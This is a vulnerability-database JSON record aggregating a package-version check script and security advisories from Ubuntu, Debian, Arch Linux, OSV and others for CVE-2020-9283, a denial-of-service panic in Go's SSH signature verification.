{'reference':'servicemesh-prometheus-2.14.0-14.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-sidecar-injector-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']},\n {'reference':'servicemesh-v1.12.10.redhat2-1.el7', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'servicemesh', 'repo_list':['service_mesh_1_1_el8']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kiali / servicemesh / servicemesh-citadel / servicemesh-galley / etc');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:27:17", "description": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows\na panic during signature verification in the golang.org/x/crypto/ssh\npackage. A client can attack an SSH server that accepts public keys. Also,\na server can attack any SSH client.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=952462>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | snapd contains an embedded copy of golang-go.crypto lxd in 18.04 LTS and earlier contains an embedded copy of golang-go.crypto \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | snapd and lxd only use the terminal sub-package, not the ssh part of golang-go.crypto, so they are not vulnerable\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-20T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9283", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-02-20T00:00:00", "id": "UB:CVE-2020-9283", "href": "https://ubuntu.com/security/CVE-2020-9283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:26", "description": "A denial-of-service vulnerability exists in Google Golang. Successful exploitation of this vulnerability could cause a denial-of-service condition.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-25T00:00:00", "type": "checkpoint_advisories", "title": "Google Golang Crypto Denial of Service (CVE-2020-9283)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-1032", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2022-01-07T14:44:05", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2455-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Brian May\nNovember 19, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : packer\nVersion : 0.10.2+dfsg-6+deb9u1\nCVE ID : CVE-2020-9283\n\ngolang-go.crypto was recently updated with a fix for CVE-2020-9283. This in\nturn requires all packages that use the affected code to be recompiled in order\nto pick up the security fix.\n\nCVE-2020-9283\n\n SSH signature verification could cause Panic when given\n invalid Public key.\n\nFor Debian 9 stretch, this problem has been fixed in version\n0.10.2+dfsg-6+deb9u1.\n\nWe recommend that you upgrade your packer packages.\n\nFor the detailed security status of packer please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/packer\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-11-18T21:02:24", "type": "debian", "title": "[SECURITY] [DLA 2455-1] packer security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-11-18T21:02:24", "id": "DEBIAN:DLA-2455-1:AB97D", "href": "https://lists.debian.org/debian-lts-announce/2020/11/msg00031.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-22T16:03:41", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2453-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Brian May\nNovember 17, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : restic\nVersion : 0.3.3-1+deb9u1\nCVE ID : CVE-2020-9283\n\ngolang-go.crypto was recently updated with a fix for CVE-2020-9283. This in\nturn requires all packages that use the affected code to be recompiled in order\nto pick up the security fix.\n\nCVE-2020-9283\n\n SSH signature verification could cause Panic when given\n invalid Public key.\n\nFor Debian 9 stretch, this problem has been fixed in version\n0.3.3-1+deb9u1.\n\nWe recommend that you upgrade your restic packages.\n\nFor the detailed security status of restic please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/restic\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-11-16T21:49:41", "type": "debian", "title": "[SECURITY] [DLA 2453-1] restic security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-11-16T21:49:41", "id": "DEBIAN:DLA-2453-1:06602", "href": "https://lists.debian.org/debian-lts-announce/2020/11/msg00027.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-03-26T19:01:36", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2402-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Brian May\nOctober 08, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : golang-go.crypto\nVersion : 1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1\nCVE ID : CVE-2019-11840 CVE-2019-11841 CVE-2020-9283\n\nCVE-2019-11840\n\n An issue was discovered in supplementary Go cryptography libraries, aka\n golang-googlecode-go-crypto. If more than 256 GiB of keystream is\n generated, or if the counter otherwise grows greater than 32 bits, the amd64\n implementation will first generate incorrect output, and then cycle back to\n previously generated keystream. Repeated keystream bytes can lead to loss of\n confidentiality in encryption applications, or to predictability in CSPRNG\n applications.\n\nCVE-2019-11841\n\n A message-forgery issue was discovered in\n crypto/openpgp/clearsign/clearsign.go in supplementary Go cryptography\n libraries. The "Hash" Armor Header specifies the message digest\n algorithm(s) used for the signature. Since the library skips Armor Header\n parsing in general, an attacker can not only embed arbitrary Armor Headers,\n but also prepend arbitrary text to cleartext messages without invalidating\n the signatures.\n\nCVE-2020-9283\n\n golang.org/x/crypto allows a panic during signature verification in the\n golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts\n public keys. Also, a server can attack any SSH client.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1.\n\nWe recommend that you upgrade your golang-go.crypto packages.\n\nFor the detailed security status of golang-go.crypto please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/golang-go.crypto\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-07T23:07:56", "type": "debian", "title": "[SECURITY] [DLA 2402-1] golang-go.crypto security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11840", "CVE-2019-11841", "CVE-2020-9283"], "modified": "2020-10-07T23:07:56", "id": "DEBIAN:DLA-2402-1:C1E9C", "href": "https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-202003-4\n=========================================\n\nSeverity: Medium\nDate : 2020-03-08\nCVE-ID : CVE-2020-9283\nPackage : golang-golang-x-crypto\nType : denial of service\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1109\n\nSummary\n=======\n\nThe package golang-golang-x-crypto before version 0.0.20200303-1 is\nvulnerable to denial of service.\n\nResolution\n==========\n\nUpgrade to 0.0.20200303-1.\n\n# pacman -Syu \"golang-golang-x-crypto>=0.0.20200303-1\"\n\nThe problem has been fixed upstream in version 0.0.20200303.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA security issue has been found in golang.org/x/crypto before\nv0.0.0-20200220183623-bac4c82f6975. An attacker can craft an ssh-\ned25519 or sk-ssh-ed25519 at openssh.com public key, such that the library\nwill panic when trying to verify a signature with it. Clients can\ndeliver such a public key and signature to any golang.org/x/crypto/ssh\nserver with a PublicKeyCallback, and servers can deliver them to any\ngolang.org/x/crypto/ssh client.\n\nImpact\n======\n\nA remote unauthenticated attacker can serve a malicious SSH public key\nand crash the service.\n\nReferences\n==========\n\nhttps://groups.google.com/forum/#!topic/golang-announce/3L45YRc91SY\nhttps://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236\nhttps://packetstormsecurity.com/files/156480/Go-SSH-0.0.2-Denial-Of-Service.html\nhttps://security.archlinux.org/CVE-2020-9283", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-03-08T00:00:00", "type": "archlinux", "title": "[ASA-202003-4] golang-golang-x-crypto: denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-03-08T00:00:00", "id": "ASA-202003-4", "href": "https://security.archlinux.org/ASA-202003-4", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-05-11T21:11:13", "description": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-18T15:29:31", "type": "osv", "title": "Improper Verification of Cryptographic Signature in golang.org/x/crypto", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-01-04T19:49:26", "id": "OSV:GHSA-FFHG-7MH4-33C4", "href": "https://osv.dev/vulnerability/GHSA-ffhg-7mh4-33c4", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-30T14:04:09", "description": "An attacker can craft an ssh-ed25519 or sk-ssh-ed25519@openssh.com public\nkey, such that the library will panic when trying to verify a signature\nwith it. If verifying signatures using user supplied public keys, this\nmay be used as a denial of service vector.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-14T20:04:52", "type": "osv", "title": "GO-2020-0012", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-05-23T18:04:20", "id": "OSV:GO-2020-0012", "href": "https://osv.dev/vulnerability/GO-2020-0012", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-06T05:18:47", "description": "\ngolang-go.crypto was recently updated with a fix for [CVE-2020-9283](https://security-tracker.debian.org/tracker/CVE-2020-9283). This in\nturn requires all packages that use the affected code to be recompiled in order\nto pick up the security fix.\n\n\n* [CVE-2020-9283](https://security-tracker.debian.org/tracker/CVE-2020-9283)\nSSH signature verification could cause Panic when given\n invalid Public key.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n0.10.2+dfsg-6+deb9u1.\n\n\nWe recommend that you upgrade your packer packages.\n\n\nFor the detailed security status of packer please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/packer>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-11-19T00:00:00", "type": "osv", "title": "packer - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-07-06T01:45:48", "id": "OSV:DLA-2455-1", "href": "https://osv.dev/vulnerability/DLA-2455-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-06T05:18:48", "description": "\ngolang-go.crypto was recently updated with a fix for [CVE-2020-9283](https://security-tracker.debian.org/tracker/CVE-2020-9283). This in\nturn requires all packages that use the affected code to be recompiled in order\nto pick up the security fix.\n\n\n* [CVE-2020-9283](https://security-tracker.debian.org/tracker/CVE-2020-9283)\nSSH signature verification could cause Panic when given\n invalid Public key.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n0.3.3-1+deb9u1.\n\n\nWe recommend that you upgrade your restic packages.\n\n\nFor the detailed security status of restic please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/restic>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-11-17T00:00:00", "type": "osv", "title": "restic - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-07-06T01:45:48", "id": "OSV:DLA-2453-1", "href": "https://osv.dev/vulnerability/DLA-2453-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-06T05:18:57", "description": "\n* [CVE-2019-11840](https://security-tracker.debian.org/tracker/CVE-2019-11840)\nAn issue was discovered in supplementary Go cryptography libraries, aka\n golang-googlecode-go-crypto. If more than 256 GiB of keystream is\n generated, or if the counter otherwise grows greater than 32 bits, the amd64\n implementation will first generate incorrect output, and then cycle back to\n previously generated keystream. Repeated keystream bytes can lead to loss of\n confidentiality in encryption applications, or to predictability in CSPRNG\n applications.\n* [CVE-2019-11841](https://security-tracker.debian.org/tracker/CVE-2019-11841)\nA message-forgery issue was discovered in\n crypto/openpgp/clearsign/clearsign.go in supplementary Go cryptography\n libraries. The Hash Armor Header specifies the message digest\n algorithm(s) used for the signature. Since the library skips Armor Header\n parsing in general, an attacker can not only embed arbitrary Armor Headers,\n but also prepend arbitrary text to cleartext messages without invalidating\n the signatures.\n* [CVE-2020-9283](https://security-tracker.debian.org/tracker/CVE-2020-9283)\ngolang.org/x/crypto allows a panic during signature verification in the\n golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts\n public keys. Also, a server can attack any SSH client.\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:0.0~git20170407.0.55a552f+REALLY.0.0~git20161012.0.5f31782-1+deb8u1.\n\n\nWe recommend that you upgrade your golang-go.crypto packages.\n\n\nFor the detailed security status of golang-go.crypto please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/golang-go.crypto>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-09T00:00:00", "type": "osv", "title": "golang-go.crypto - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11840", "CVE-2019-11841", "CVE-2020-9283"], "modified": "2022-07-06T01:45:44", "id": "OSV:DLA-2402-1", "href": "https://osv.dev/vulnerability/DLA-2402-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gitlab": [{"lastseen": "2022-06-09T23:16:12", "description": "`golang.org/x/crypto` allows a panic during signature verification in the `golang.org/x/crypto/ssh` package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-20T00:00:00", "type": "gitlab", "title": "Improper Verification of Cryptographic Signature", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-02-20T00:00:00", "id": "GITLAB-F87F78376FBF3CE972F07B249EED8845", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/go%2Fgolang.org%2Fx%2Fcrypto%2FCVE-2020-9283.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:01", "description": "\nGo SSH servers 0.0.2 - Denial of Service (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 